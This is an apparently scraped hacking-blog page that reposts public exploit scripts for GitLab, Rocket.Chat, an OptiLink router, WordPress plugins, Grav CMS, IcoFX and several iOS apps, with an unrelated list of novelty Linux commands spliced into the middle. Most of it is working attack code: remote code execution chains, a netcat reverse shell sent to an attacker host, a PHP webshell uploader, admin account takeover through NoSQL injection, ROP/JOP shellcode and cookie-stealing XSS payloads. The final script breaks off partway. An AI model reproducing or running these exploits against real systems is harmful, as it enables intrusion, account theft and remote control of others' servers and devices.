# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Date: 04/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.10.3
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.10.2 CE
# Credits: https://hackerone.com/reports/1154542
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()
username = args.u
password = args.p
gitlab_url = args.t
command = args.c
session = requests.Session()
# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
login_form = {
"authenticity_token": token,
"user[login]": username,
"user[password]": password,
"user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
if r.status_code != 200:
exit(f"Login Failed:{r.text}")
else:
print("Successfully Authenticated")
# payload creation
print("[2] Creating Payload ")
payload = f"\" . qx{{{command}}} . \\\n"
f1 = open("/tmp/exploit","w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()
# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
# Building the payload
os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')
# Uploading it
print("[3] Creating Snippet and Uploading")
# Getting the CSRF token
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
'Accept': 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': f'{gitlab_url}/projects',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'X-Requested-With': 'XMLHttpRequest',
'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
if r.text != "Failed to process image\n":
exit("[-] Exploit failed")
else:
print("[+] RCE Triggered !!")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141453
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
# Version: 4Images Gallery 1.8
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27308
-Description:
A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.
-Steps to reproduce:
1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
2- Enter the credentials , Turn on the intercept and click on "Login"
3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
4-Forward the request and you can see XSS is triggered.
In our opinion, Linux is the entire command line. There are many commands to implement a certain function. This is precisely this that it also gives a certain threshold for learning Linux. But do you know? There are also many interesting commands in Linux, and of course all Linux distributions can install and run these commands! Let’s play together!
sl command
You will see a train driving from the right side of the screen to the left.
Install
sudo apt-get install sl 
run
sl 
The command has several options: -alFe.
-a An accident seems to happen. You’ll feel goal for people who cry for help.
-l shows little one.
-F It flies.
-e Allow interrupt by Ctrl+C. You can give someone a prank. If he hits ls, what he doesn't know will definitely be effective.
alias ls=sl
fortune command
Output a sentence, there are jokes, famous quotes, etc. (There are also Tang poetry and Song lyrics sudo apt-get install fortune-zh)
Install
sudo apt-get install fortune
fortune 
cowsay command
Use ASCII characters to print cows, sheep and other animals, and there is also a cowthink. This is the cow and that is the cow saying, haha, it is almost the same
Install
sudo apt-get install cowsay run
cowsay 'Big Cousin, awesome 666' 
cowsay -l Check the names of other animals, and then -f keep up with the names of animals, such as
cowsay -f tux 'Take it' 
You can also let cowsay say the content of fortune, like this:
fortune | cowsay
cmatrix command
This is cool!《黑客帝国》 The matrix-style animation effect
Install
sudo apt-get install cmatrix run
cmatrix 
figlet, toilet command
Word Art Generator, composed of ASCII characters, displays the text as a title bar. There is also the banner command
Install
sudo apt-get install figlet
sudo apt-get install toilet run
figlet bbskali.cn !
Toilet bbskali.cntoilet can also add colors. Please use the options in it yourself.
toilet -f mono12 -F bbskali.cn 
oneko command
A cat star appears on the desktop, following your mouse, and it will sleep if you don’t move. Haha, this is pretty good
Install $
sudo apt-get install oneko runs oneko and want to turn off this guy, press ctrl+c to end
xeyes command
A pair of eyes appear on the screen, staring at your mouse pointer
Installation and operation as above
yes command
Output endless characters, press ctrl+c to end, such as
yes I'm very NB
cal 9 1752
cal is printing a calendar, but this is a very weird month.
shred
Overwriting messy files means shattering the documents. Haha, if you want to destroy the blockbuster seeds and movies you have hidden privately, you will rely on it.
# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
# Version: 5.5
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)
# Exploit Author: Hardik Solanki
# Date: 05/06/2021
# Software Link: https://wordpress.org/plugins/smart-slider-3/
# Version: 3.5.0.8
# Tested on Windows
*How to reproduce vulnerability:*
1. Install WordPress 5.7.2
2. Install and activate the "*Smart Slider 3" Version 3.5.0.8* plugin
3. Navigate to "*Dashboard* and create a "*New Project*".
4. Enter the JavaScript payload "*<script>alert(document.cookie)</script>*" into the "*Name*" field.
5. You will observe that the Project has been created with malicious
JavaScript payload "<script>alert(document.cookie)</script>" and hence
project has been* created/stored* and thus JavaScript payload is executing
successfully.
*XSS IMPACT:*
1: Steal the cookie
2: User redirection to a malicious website
# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
# Version: 5.3
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP
# Date: 2020-05-20
# Exploit Author: Austin Babcock
# Vendor Homepage: https://icofx.ro/
# Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing
# Version: 2.6.0.0
# Tested on: Windows 7 Ultimate x64
# CVE: CVE-2013-4988
# Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu
# Payload Length: 1626 bytes
#While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate.
#Gadgets were found using the JOP ROCKET tool which is available at https://github.com/Bw3ll/JOP_ROCKET
#This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect().
#JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table.
#The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes.
#After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget.
#Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget.
#In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address.
#The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address..
#!/usr/bin/python2
import struct
# Stuff we'll need for creating our malicious .ico
header = "\x00\x00\x01\x00\x00\x6F"
option = "\x02\x00\x00\x00"
pad2 = "\x41"*8
nseh = "\xfe\xff\xff\xff"
base = 0x400000
# SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET
seh = struct.pack('<L', 0x0044f012)
###########################
#### LOAD DISPATCH TABLE ADDR INTO ECX ####
#The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory.
jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <-
jopSetup += struct.pack('<I',0x0000000) #clear ecx
jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN
jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN
jopSetup += struct.pack('<I',0x00009f0) # offset for disp table
jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table
#### LOAD ADD VALUE PTR INTO EAX ####
#Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table,
#eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes.
#In this case, eax will point to an address containing the value 0x00000004.
jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <-
jopSetup += struct.pack('<I',0x0000000) # junk
jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
#### LOAD WRITABLE ADDR OFFSET INTO EBX ####
#The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided.
#In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so
#that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value.
jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN
jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr
#### LOAD DISPATCHER ADDR INTO EDI ####
jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN
jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address
#Dispatcher:
#add ecx, dword ptr [eax] 0x406d81 (offset 0x6d81)
#jmp dword ptr [ecx]
#### BEGIN JOP -- PERFORM STACK PIVOT ####
jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI
table = struct.pack('<I',0x44444444) # padding
#PIVOT 40 BYTES
#Last POP will put VP ptr in EBP
for i in range(10):
table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <-
#### CALL VirtualProtect() ####
#The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp.
#To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order
#to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below.
table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <-
# VP ptr + offset for jmp ebp gadget
vpPtr = struct.pack('<I',0x00bf6668 + 0x71)
############################################################################################
msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80"
"\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED"
"\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75"
"\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68"
"\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51"
"\x50\xFF\xD7")
# ExitProcess(0);
exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10"
addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode
shellcode = addesp + msg_sc + exit_sc
nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20
# padding until VP parameter location
paramPad = "C" *(36)
paramPad += vpPtr
### VIRTUAL PROTECT PARAMETERS ###
vpParams = struct.pack('<I',0x18f744) #return addr
vpParams += struct.pack('<I',0x18f744) #lpAddr
vpParams += struct.pack('<I',0x500) #dwSize
vpParams += struct.pack('<I',0x40) #flNewProt
vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect
# pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table
pad1 = "A"*580 + jopSetup + paramPad + vpParams + nopwrap
addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address
pad1 += addVal
pad1 += table # dispatch table
pad1 += "B"*(0x640-len(pad1))
# Piece together our exploit
payload = header + pad1 + option + pad2 + nseh + seh
# Write out our malicious file
writeFile = open ("maliciousJOP.ico", "wb")
writeFile.write( payload )
writeFile.close()
# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010
# Version: 1.4.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
# Date: 23/03/2021
# Exploit Authors: Developed by SecNigma and Amal.
# Vendor Homepage: https://optilinknetwork.com/
# Version: ONT1GEW V2.1.11_X101 Build.1127.190306
# Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above,
# as they do not release the firmware to the public for some unknown reason.
# Additional notes:
# Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306.
# Device Name: ONT1GEW
# Software Version: V2.1.11_X101
# Build Information: Build.1127.190306
# Chances are that XPONs of C-DATA company are affected too.
# Our research indicated that Optilink devices are just a rebranded version of C-Data.
# This exploit was tested on the following configuration.
#!/usr/bin/python3
import requests
import argparse
import re
def is_login_success(r):
match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text)
if match:
return match
# Default configuration
# Router address = 192.168.101.1
# LPORT = 9001
# Default Username = e8c / Backdoor /
# Default Password = e8c / Credentials /
parser= argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP")
parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")
parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router")
parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router")
args = parser.parse_args()
target=args.target,
lhost=args.lhost,
lport=args.lport,
user=args.user,
passw=args.passw
# e8c:e8c are the backdoor administrator creds to Optilink devices
# Alternate backdoor credentials are adsl:realtek, admin:admin.
user2="e8c"
passw2="e8c"
home_url="http://"+target[0]+"/boaform/admin/formLogin"
print("[+] Trying to authenticate...")
# Authenticate ourselves first
data={'username':user, 'psd':passw}
r=requests.post(home_url,data)
res=is_login_success(r)
if res:
print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"")
print("[-] Exploit failed with the following error:")
print(res)
print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?")
val = input("Press y or n : ")
if val[0].lower()=="y":
print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"")
# Authenticate ourselves with new creds
data={'username':user2, 'psd':passw2}
r=requests.post(home_url,data)
res2=is_login_success(r)
if res2:
print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"")
print("[-] Exploit failed with the following error:")
print(res2)
print("[-] Halting Execution.")
exit()
else:
print("Received input "+val+"")
print("[-] Halting Execution.")
exit()
print("[+] Looks like authentication was succesful!")
print("[+] Trying to fetch the WAN Name...")
# Fetching Wan Name
# wan_name="1_INTERNET_R_VID_***"
get_wan_url = "http://"+target[0]+"/diag_ping.asp"
r=requests.get(get_wan_url)
match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text)
wan_name=match[0]
print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..")
print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*")
print("[+] If everything went right, you should've gotten a shell right now!")
# Starting Exploitation
# The same vulnerability exists in formPing and formTracert.
# exploit_url = "http://"+target[0]+"/boaform/admin/formPing"
exploit_url = "http://"+target[0]+"/boaform/admin/formTracert"
# Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :)
# BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it.
# The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload.
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"'
r=requests.post(exploit_url,post_data)
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
# Author: enox
# Date: 06-06-2021
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat 3.12.1
# CVE: CVE-2021-22911
# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
#!/usr/bin/python
import requests
import string
import time
import hashlib
import json
import oathtool
import argparse
parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
parser.add_argument('-a', help='Administrator email', required=True)
parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
args = parser.parse_args()
adminmail = args.a
lowprivmail = args.u
target = args.t
def forgotpassword(email,url):
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
print("[+] Password Reset Email Sent")
def resettoken(url):
u = url+"/api/v1/method.callAnon/getPasswordPolicy"
headers={'content-type': 'application/json'}
token = ""
num = list(range(0,10))
string_ints = [str(int) for int in num]
characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
while len(token)!= 43:
for c in characters:
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
time.sleep(0.5)
if 'Meteor.Error' not in r.text:
token += c
print(f"Got: {token}")
print(f"[+] Got token : {token}")
return token
def changingpassword(url,token):
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
if "error" in r.text:
exit("[-] Wrong token")
print("[+] Password was changed !")
def twofactor(url,email):
# Authenticating
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
if "error" in r.text:
exit("[-] Couldn't authenticate")
data = json.loads(r.text)
data =(data['message'])
userid = data[32:49]
token = data[60:103]
print(f"[+] Succesfully authenticated as {email}")
# Getting 2fa code
cookies = {'rc_uid': userid,'rc_token': token}
headers={'X-User-Id': userid,'X-Auth-Token': token}
payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
r = requests.get(url+payload,cookies=cookies,headers=headers)
code = r.text[46:98]
print(f"Got the code for 2fa: {code}")
return code
def changingadminpassword(url,token,code):
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
if "403" in r.text:
exit("[-] Wrong token")
print("[+] Admin password changed !")
def rce(url,code,cmd):
# Authenticating
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
headers={'content-type': 'application/json'}
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
if "error" in r.text:
exit("[-] Couldn't authenticate")
data = json.loads(r.text)
data =(data['message'])
userid = data[32:49]
token = data[60:103]
print("[+] Succesfully authenticated as administrator")
# Creating Integration
payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
cookies = {'rc_uid': userid,'rc_token': token}
headers = {'X-User-Id': userid,'X-Auth-Token': token}
r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
data = r.text
data = data.split(',')
token = data[12]
token = token[9:57]
_id = data[18]
_id = _id[7:24]
# Triggering RCE
u = url + '/hooks/' + _id + '/' +token
r = requests.get(u)
print(r.text)
############################################################
# Getting Low Priv user
print(f"[+] Resetting {lowprivmail} password")
## Sending Reset Mail
forgotpassword(lowprivmail,target)
## Getting reset token
token = resettoken(target)
## Changing Password
changingpassword(target,token)
# Privilege Escalation to admin
## Getting secret for 2fa
secret = twofactor(target,lowprivmail)
## Sending Reset mail
print(f"[+] Resetting {adminmail} password")
forgotpassword(adminmail,target)
## Getting reset token
token = resettoken(target)
## Resetting Password
code = oathtool.generate_otp(secret)
changingadminpassword(target,token,code)
## Authenticting and triggering rce
while True:
cmd = input("CMD:> ")
code = oathtool.generate_otp(secret)
rce(target,code,cmd)
# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.3.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open Nsauditor.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("NBM.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
# Google Dork: inurl:/wp-content/plugins/wpdiscuz/
# Date: 2021-06-06
# Original Author: Chloe Chamberland
# Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0
# Vendor Homepage: https://gvectors.com/
# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
# Version: 7.0.4
# Tested on: Ubuntu / WordPress 5.6.2
# CVE : CVE-2020-24186
#!/bin/bash
if [ -z $1 ]
then
echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"
exit 0
elif [ -z $2 ]
then
echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"
exit 0
else
post=$(curl -sI http://$1$2/ | head -n1)
if [[ "$post" == *"200 OK"* ]]; then
wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3)
webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a system($cmd);\x0d\x0a die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g')
echo -e "\nWebshell:" $webshell"\n"
echo -e "--------------WIN--------------"
echo -e " ¡Got webshell! "
echo -e "-------------------------------\n"
while :
do
read -p '$ ' command
curl -s $webshell?cmd=$command | grep -v GIF8
done
else
echo -e "\n[!] The indicated post was not found\n"
fi
fi
# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)
# Author: enox
# Date: 06-06-2021
# Vendor: https://getgrav.org/
# Software Link: https://getgrav.org/download/core/grav-admin/1.7.10
# Vulnerable Version(s): Grav CMS 1.7.10
# CVE: CVE-2021-29440
# Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities
# NOTES: You need a user who has access to /admin dashboard with page creation privileges.
#!/usr/bin/python
import requests
from bs4 import BeautifulSoup
import random
import string
username = 'username'
password = 'password'
url = 'http://grav.local'
session = requests.Session()
# Autheticating
## Getting login-nonce
def login(url,username,password):
r = session.get(url + "/admin")
soup = BeautifulSoup(r.text, features="lxml")
nonce = str(soup.findAll('input')[2])
nonce = nonce[47:79]
## Logging in
payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = session.post(url+"/admin",data=payload,headers=headers)
# Creating Page for RCE
def rce(url,cmd):
## Getting form nonce and unique form id
project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8))
r = session.get(url+f"/admin/pages/{project_name}/:add")
